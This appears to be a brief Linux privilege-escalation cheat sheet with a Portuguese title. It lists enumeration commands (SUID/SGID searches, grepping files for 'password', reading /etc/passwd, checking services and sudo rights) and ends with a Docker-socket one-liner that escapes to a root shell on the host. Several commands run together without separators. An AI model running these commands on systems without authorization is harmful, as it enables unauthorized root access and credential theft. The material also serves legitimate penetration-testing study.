Escalação de Privilégios
Locate SUID/SGID files:
-perm +6000 -type f-perm +6000 -user root -type f(2000 = SGID, 4000 = SUID, 6000 = SUID+SGID)
Search by name:
-name *.log
Run commands on each item:
-exec grep 'password' {} \; What's the OS? What version? What architecture?
cat /etc/*-release
uname -i
lsb_release -a (Debian based OSs)
Who are we? Where are we?
Who uses the box? What users? (And which ones have a valid shell)
cat /etc/passwd
grep -vE "nologin|false" /etc/passwd
What's currently running on the box? What active network services are there?
ps aux
netstat -antup
What's installed? What kernel is being used?
dpkg -l (Debian based OSs)
rpm -qa (CentOS / openSUSE )
uname -a
# procurar por arquivos com permissão totalfind / -type f -perm 0777 2>/dev/null $ sudo -l # list binaries with sudo privies Dockerdocker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
Last updated
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